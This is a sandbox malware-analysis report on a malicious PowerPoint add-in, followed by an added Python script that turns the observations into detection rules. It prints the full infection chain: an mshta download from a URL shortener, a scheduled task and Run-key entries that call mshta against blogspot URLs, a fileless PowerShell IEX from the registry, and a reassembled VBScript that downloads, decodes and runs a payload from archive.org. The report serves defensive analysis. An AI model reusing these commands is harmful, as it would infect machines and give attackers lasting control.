Summary | ZeroBOX

Company Details.ppam

Tags: VBA_macro, PNG Format

Category: FILE
Machine: s1_win7_x6402
Started: April 30, 2021, 9:43 a.m.
Completed: April 30, 2021, 9:45 a.m.

Size: 11.9KB
Type: Microsoft PowerPoint 2007+ (.ppam is the macro-enabled PowerPoint add-in format)
MD5: c8e1760af8a65590d26315a4ff144b62
SHA256: dffd29f5fcbcb7ee1f0a4d31e3cf616b6a525275b49d9d47d625f811f48cfc08
CRC32: DC3F931A
ssdeep: 192:ZILz+pGqEls2oGnmaPuXDgrUIWBf+t1+MbJcsRgV7QyD0OoAisP3A3:mGpGqcsXGnFPSxI++T+Mbip/hu
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49812 -> 172.217.26.137:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49817 -> 142.250.66.109:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49819 -> 207.241.227.129:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49810 -> 142.250.199.65:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49814 -> 142.250.66.41:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49815 -> 142.250.66.41:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49813 -> 172.217.26.137:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Note: all seven alerted flows go to the same Google (blogger.com, blogspot.com) and archive.org endpoints that the mshta-driven HTTP requests further down fetch from, and the certificates in the TLS table below confirm that. A JA3 hash identifies a TLS client implementation, not a malware family, and several client stacks share a hash, so treat this as a fingerprint match on the Windows HTTP stack that mshta is using rather than as Tofsee attribution; the process and destination context is what carries the verdict here.

Suricata TLS

Flow Issuer Subject Fingerprint

TLSv1  192.168.56.102:49812 -> 172.217.26.137:443
  Issuer: C=US, O=Google Trust Services, CN=GTS CA 1O1
  Subject: C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com
  Fingerprint: 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37

TLSv1  192.168.56.102:49810 -> 142.250.199.65:443
  Issuer: C=US, O=Google Trust Services, CN=GTS CA 1O1
  Subject: C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com
  Fingerprint: 9c:32:17:b5:e8:f9:04:a7:4d:a7:f0:b9:db:ca:b3:18:75:b5:cb:50

TLSv1  192.168.56.102:49819 -> 207.241.227.129:443
  Issuer: C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2
  Subject: OU=Domain Control Validated, CN=*.us.archive.org
  Fingerprint: 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0

TLSv1  192.168.56.102:49814 -> 142.250.66.41:443
  Issuer: C=US, O=Google Trust Services, CN=GTS CA 1O1
  Subject: C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com
  Fingerprint: 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37

TLSv1  192.168.56.102:49815 -> 142.250.66.41:443
  Issuer: C=US, O=Google Trust Services, CN=GTS CA 1O1
  Subject: C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com
  Fingerprint: 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37

TLSv1  192.168.56.102:49813 -> 172.217.26.137:443
  Issuer: None  Subject: None  Fingerprint: None (no certificate logged for this flow)

Time & API Arguments Status Return Repeated

GetComputerNameW  computer_name: TEST22-PC  (status 1, return 1, repeated 0)
GetComputerNameW  computer_name: TEST22-PC  (status 1, return 1, repeated 0)
GetComputerNameW  computer_name: TEST22-PC  (status 1, return 1, repeated 0)

Time & API Arguments Status Return Repeated

WriteConsoleW  buffer: SUCCESS: The scheduled task "WIND0WSUPLATE" has successfully been created.  console_handle: 0x00000007  (status 1, return 1, repeated 0)

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx  (no arguments)  (status 1, return 1, repeated 0)
Suspicious request (GET with no User-Agent header): GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt

HTTP requests, in order
GET http://www.j.mp/ddsobpechateessentesathatesesjdw
GET http://bit.ly/ddsobpechateessentesathatesesjdw
GET https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html
GET https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css
GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js
GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=b73d5666-d098-4854-a4dd-8e948356adfd
GET https://www.blogger.com/static/v1/widgets/1564291244-widgets.js
GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif
GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png
GET https://www.blogger.com/blogin.g?blogspotURL=https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html&type=blog
GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
GET https://www.blogger.com/img/share_buttons_20_3.png
GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt
Time & API Arguments Status Return Repeated

Memory protection and allocation calls. Every call in this table has process_handle 0xffffffff (the current-process pseudo-handle), stack_dep_bypass 0, stack_pivoted 0, a 4096-byte region (length for NtProtectVirtualMemory, region_size for NtAllocateVirtualMemory) and status 1, return 0, repeated 0; the NtAllocateVirtualMemory rows also carry allocation_type 4096 (MEM_COMMIT). Consecutive calls that are identical in every argument are collapsed into one row with a call count; the order of rows is the order the calls were logged.

API                      PID   base_address  protection                   heap_dep_bypass  calls
NtProtectVirtualMemory   996   0x73711000    64 (PAGE_EXECUTE_READWRITE)  0                1
NtProtectVirtualMemory   996   0x05661000    64 (PAGE_EXECUTE_READWRITE)  0                1
NtAllocateVirtualMemory  996   0x046a0000    64 (PAGE_EXECUTE_READWRITE)  0                2
NtAllocateVirtualMemory  996   0x046f0000    64 (PAGE_EXECUTE_READWRITE)  0                1
NtAllocateVirtualMemory  996   0x04700000    64 (PAGE_EXECUTE_READWRITE)  0                1
NtProtectVirtualMemory   3532  0x73772000    64 (PAGE_EXECUTE_READWRITE)  0                1
NtProtectVirtualMemory   3532  0x04630000    64 (PAGE_EXECUTE_READWRITE)  1                3
NtProtectVirtualMemory   3532  0x04631000    64 (PAGE_EXECUTE_READWRITE)  1                6
NtProtectVirtualMemory   3532  0x04632000    64 (PAGE_EXECUTE_READWRITE)  1                4
NtProtectVirtualMemory   3532  0x04633000    64 (PAGE_EXECUTE_READWRITE)  1                2
NtProtectVirtualMemory   3532  0x04634000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x04635000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x04636000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x04637000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x04638000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x04639000    64 (PAGE_EXECUTE_READWRITE)  1                2
NtProtectVirtualMemory   3532  0x0463a000    64 (PAGE_EXECUTE_READWRITE)  1                2
NtProtectVirtualMemory   3532  0x0463b000    64 (PAGE_EXECUTE_READWRITE)  1                7
NtProtectVirtualMemory   3532  0x0463c000    64 (PAGE_EXECUTE_READWRITE)  1                4
NtProtectVirtualMemory   3532  0x0463d000    64 (PAGE_EXECUTE_READWRITE)  1                1
NtProtectVirtualMemory   3532  0x0463e000    64 (PAGE_EXECUTE_READWRITE)  1                2
NtProtectVirtualMemory   3532  0x0463f000    64 (PAGE_EXECUTE_READWRITE)  1                4
NtProtectVirtualMemory   3532  0x04a10000    64 (PAGE_EXECUTE_READWRITE)  1                1

Reading: in PID 3532 the sixteen consecutive pages from 0x04630000 to 0x0463f000 are made readable, writable and executable one page at a time (heap_dep_bypass 1 is the sandbox's flag for heap memory being given execute permission), which is the pattern of a loader writing code into a heap buffer before running it.
Files written (Internet Explorer cache entries matching the blogger.com scripts requested above)
C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js
C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js
C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\1564291244-widgets[1].js

Command lines
mshta http://www.j.mp/ddsobpechateessentesathatesesjdw
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
Time & API Arguments Status Return Repeated

ShellExecuteExW  show_type: 0  filepath_r: schtasks  filepath: schtasks
  parameters: /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
  (status 1, return 1, repeated 0)

ShellExecuteExW  show_type: 0  filepath_r: cMd  filepath: cMd
  parameters: /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
  (status 1, return 1, repeated 0)

The echo chain above writes C:\Users\Public\SiggiaW.vbs line by line, runs it, then deletes it. Reassembled from the command line, the script it writes is:

  dim http_obj
  dim stream_obj
  dim shell_obj
  set http_obj = CreateObject("Microsoft.XMLHTTP")
  set stream_obj = CreateObject("ADODB.Stream")
  set shell_obj = CreateObject("WScript.Shell")
  URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt"
  http_obj.open "GET", URL, False
  http_obj.send
  stream_obj.type = 1
  stream_obj.open
  stream_obj.write http_obj.responseBody
  stream_obj.savetofile "C:\Users\Public\1.txt", 2
  Dim xxx
  Set xxx = CreateObject("Scripting.FileSystemObject")
  Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1)
  content = file.ReadAll
  content = StrReverse(content)
  Dim fso
  Dim fdsafdsa
  Dim oNode, fdsaa
  Const adTypeBinary = 1
  Const adSaveCreateOverWrite = 2
  Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
  oNode.dataType = "bin.base64"
  oNode.Text = content
  Set fdsaa = CreateObject("ADODB.Stream")
  fdsaa.Type = adTypeBinary
  tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs")
  LocalFile = tempdir
  fdsaa.Open
  fdsaa.Write oNode.nodeTypedValue
  fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set fdsafdsa = CreateObject("WScript.Shell")
  If (fso.FileExists(LocalFile)) Then
  fdsafdsa.RUN (LocalFile)
  End If

So the next stage is fetched from archive.org as text, stored as 1.txt, reversed, base64-decoded through an MSXML bin.base64 element, written to C:\Users\Public\bin.vbs and executed.
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory  PID 3532  base_address: 0x04630000  length: 4096  protection: 16 (PAGE_EXECUTE)  heap_dep_bypass: 1  stack_dep_bypass: 0  stack_pivoted: 0  process_handle: 0xffffffff  (status 1, return 0, repeated 0)

This is the first page of the 0x04630000 region that PID 3532 made PAGE_EXECUTE_READWRITE earlier, now changed to execute-only, consistent with the write phase being over and the region being finalised as code.
cmdline cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
Host contacted: 172.217.25.14

Run-key persistence under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (value name = value data)
DLESOLCRETSAM = mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close")
dkkkksakdosexography = "mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html"
(Default) = "mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html"
nunukhaoo = "mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html"

Two points for anyone extracting indicators from these values. The "1230948%1230948@" prefix is the userinfo part of the URL, not the host: mshta connects to the blogspot.com name after the "@", so that hostname is the indicator, and the digits block nothing. The DLESOLCRETSAM entry is fileless: it launches PowerShell to read the MSOFFICELO value under HKCU\Software and hands it to Invoke-Expression (IEX); the write of that value is not captured in this report, so the payload it holds is unknown here.
Time & API Arguments Status Return Repeated

RegSetValueExA  key_handle: 0x000002d0  regkey_r: ProxyEnable  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable  reg_type: 4 (REG_DWORD)  value: 0  (status 1, return 0, repeated 0)
Antivirus detections (vendor: detection name)

Alibaba: TrojanDownloader:VBA/MalDoc.ali1000101
Arcabit: VBA:Amphitryon.227
Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen
BitDefender: VBA:Amphitryon.227
NANO-Antivirus: Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan: VBA:Amphitryon.227
Ad-Aware: VBA:Amphitryon.227
McAfee-GW-Edition: Artemis!Trojan
FireEye: VBA:Amphitryon.227
Emsisoft: VBA:Amphitryon.227 (B)
Ikarus: Trojan-Downloader.VBA.Agent
GData: VBA:Amphitryon.227
AegisLab: Trojan.MSOffice.SAgent.4!c
SentinelOne: Static AI - Malicious OPENXML
Fortinet: VBA/Agent.3FED!tr
Time & API Arguments Status Return Repeated

RegSetValueExA  key_handle: 0x000006b8  regkey_r: DLESOLCRETSAM  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM  reg_type: 1 (REG_SZ)  value: mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close")  (status 1, return 0, repeated 0)
Parent process: powerpnt.exe  ->  martian (unexpected child) process: mshta http://www.j.mp/ddsobpechateessentesathatesesjdw
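The command lines, Run-key values and the powerpnt.exe -> mshta parent/child pair above are the observable chain: an Office process spawning mshta with a URL, a scheduled task whose action is mshta running inline vbscript:, Run-key values that invoke mshta against URLs whose real host sits behind a userinfo prefix, and a PowerShell stage that reads its payload out of the registry and pipes it to IEX. The Python below is an added example, not part of the ZeroBOX report, that encodes those observations as detection rules and runs them over events constructed from this report; the event schema, rule names and office-parent list are this example's own assumptions, not a sandbox or SIEM format.

```python
import re
from urllib.parse import urlsplit

# Events constructed from the ZeroBOX report above: the process command lines, the
# Run-key values and the powerpnt.exe -> mshta parent/child pair.  The event
# schema and rule names are this example's own, and the cMd /c line is cut down
# to its first and last fragments because only its shape matters to the rule.
EVENTS = [
    {"type": "process", "parent": "powerpnt.exe",
     "cmdline": "mshta http://www.j.mp/ddsobpechateessentesathatesesjdw"},
    {"type": "process", "parent": None,
     "cmdline": r'schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")'},
    {"type": "process", "parent": None,
     "cmdline": r'cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM",
     "value": r'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close")'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography",
     "value": r'"mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html"'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)",
     "value": r'"mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html"'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo",
     "value": r'"mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html"'},
]

# Assumed list of Office parents worth alerting on; extend for your estate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
URL_RE = re.compile(r'https?://[^\s"\'\\),]+', re.IGNORECASE)
MSHTA_RE = re.compile(r'(?:^|[\s"\\])mshta\b', re.IGNORECASE)
INLINE_VBS_RE = re.compile(r"mshta\b.{0,8}?vbscript:", re.IGNORECASE)
IEX_FROM_REG_RE = re.compile(r"\(\s*gp\s+HK[A-Z]+:[^)]*\)\.\w+\s*\)?\s*\|\s*IEX", re.IGNORECASE)
ECHO_DROP_RE = re.compile(r"@echo\b.*?>>\s*(\S+\.(?:vbs|js|hta|ps1|bat))", re.IGNORECASE)


def real_host(url):
    """Hostname actually contacted, and whether the URL carried a userinfo part.
    'http://1230948%1230948@host/...' puts digits before the '@' so a quick read
    sees them instead of the blogspot.com name that is really contacted."""
    parts = urlsplit(url)
    return parts.hostname, parts.username is not None


def executable_name(cmdline):
    """Lowercase image name from a command line: quotes and path stripped,
    'schtasks' or 'schtasks.exe' kept as typed."""
    if not cmdline:
        return ""
    return cmdline.split(None, 1)[0].strip('"').rsplit("\\", 1)[-1].lower()


def inspect(event):
    """Apply the rules to one event; returns (rule, detail) pairs."""
    hits = []
    text = event.get("cmdline") or event.get("value") or ""
    exe = executable_name(text)
    for url in URL_RE.findall(text):
        host, obscured = real_host(url)
        if obscured:
            hits.append(("url_with_userinfo", host))
    if INLINE_VBS_RE.search(text):
        hits.append(("mshta_inline_vbscript", exe or event.get("key", "")))
    if IEX_FROM_REG_RE.search(text):
        hits.append(("powershell_iex_from_registry", exe or event.get("key", "")))
    if event["type"] == "process":
        parent = (event.get("parent") or "").lower()
        if exe in ("mshta", "mshta.exe") and parent in OFFICE_PARENTS:
            hits.append(("office_spawns_mshta", parent))
        if exe in ("schtasks", "schtasks.exe") and re.search(r"/create\b", text, re.IGNORECASE):
            action = re.search(r"/tr\s+(.*)", text, re.IGNORECASE | re.DOTALL)
            name = re.search(r'/tn\s+"*([^"\s]+)', text, re.IGNORECASE)
            if action and MSHTA_RE.search(action.group(1)):
                hits.append(("schtasks_runs_mshta", name.group(1) if name else "?"))
        if exe in ("cmd", "cmd.exe"):
            drop = ECHO_DROP_RE.search(text)
            if drop:
                hits.append(("cmd_echo_drops_script", drop.group(1)))
    elif event["type"] == "registry":
        if re.search(r"\\CurrentVersion\\Run\\", event["key"], re.IGNORECASE) and MSHTA_RE.search(text):
            hits.append(("run_key_mshta", event["key"].rsplit("\\", 1)[-1]))
    return hits


def triage(events):
    """All hits over a list of events, in event order."""
    return [hit for event in events for hit in inspect(event)]


def obscured_hosts(events):
    """The hostnames hidden behind userinfo prefixes, i.e. the real indicators."""
    return {detail for rule, detail in triage(events) if rule == "url_with_userinfo"}


if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule:30} {detail}")
```

The rules key on structure rather than on the specific blogspot names, so the same code flags a different task name or a different userinfo-prefixed URL; real_host is the piece worth reusing in indicator extraction, since a blocklist built from the text before the "@" would match nothing on the wire.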